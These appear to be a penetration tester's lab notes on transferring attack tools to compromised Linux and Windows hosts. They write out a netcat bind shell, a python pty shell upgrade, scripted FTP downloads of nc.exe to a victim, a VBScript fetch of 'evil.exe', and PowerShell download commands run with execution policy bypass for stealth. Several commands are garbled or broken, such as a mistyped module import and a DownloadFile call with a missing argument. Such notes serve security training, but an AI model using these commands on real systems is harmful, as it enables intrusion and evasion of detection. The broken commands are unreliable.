Transfering Modules
Dangers of transferring attack tools:
we should try to use the native tools(victim's tools) for detection avoidance,
Installing Pure-FTPd
`` sudo apt update && sudo apt -y install pure-ftpd
``
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
systemctl restart pure-ftpd
non-interactive shell:
nc -lvnp 4444 -e /bin/bash
nc -vn 10.10.0.128 4444
----
netcat provides a non-interactive shell.
login to ftp account-> nothing happens(we're interacting in the background)
STDOUT is not correctly redirected in the basic bind or reverse shell.
you have to exit out.
---
Upgrading non-interactive shell.
python interpreter comes with pty module. we can use this process to spawn fully interactive shell
nc -vn 10.10.10.111 4444
**python -c 'import ty; pty.spawn("/bin/bash")' **
frtp 10.10.11.4
now we can interact!
Transferring Files with Windows host
Non-interactive FTP download
Assuming we already have a shell on the window's machine,
1. ftp --help
-s:filename specifies a text file containing FTP commands -> we could use this.
the idea is to create a text file with FTP commands in it.
2. in the /ftphome/ directory, place a netcat binary.
3. start the ftp server on kali
sudo systemctl restart pure-ftpd
4. create a text file with echo commands.
-echo open 10.11.0.4 21 >> ftp.txt
- echo USER offsec>> ftp.txt (USER)
- echo lab>> ftp.txt (PASS)
echo bin >> ftp.txt (binary transfer)
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
5. ftp -v -n -s:ftp.txt
-v suppress any return output
-n supress automatic login
VBScript
copy the window's version of wget to our root
cscript wget.vbs http://192.168.10.5/evil.exe evil.exe this will download a file from our machine. (upload it to the victim's machine)
Easier
Remember since we only have a non-interactive shell we cannot start PowerShell.exe, because our shell can't handle that. But we can get around that by creaing a PowerShell-script and then executing the script:
Now we invoke it with this crazy syntax: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
-ExecutionPolicy Bypass -noLogo -NonInteractive --- stealthly
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.119.146/gori.ps1')"
Transfering files through powershell
1. On kali machine copy whatever you want to send to the web root (/var/www/html/) and start the apache server.
2. Useful scripts are in /usr/share/nishang
2. On the windows machine type the following command:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.10.128/unko.txt','C:\Users\Administrator\Desktop\transferme.txt')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://1
92.168.119.146/gori.ps1')"
Last updated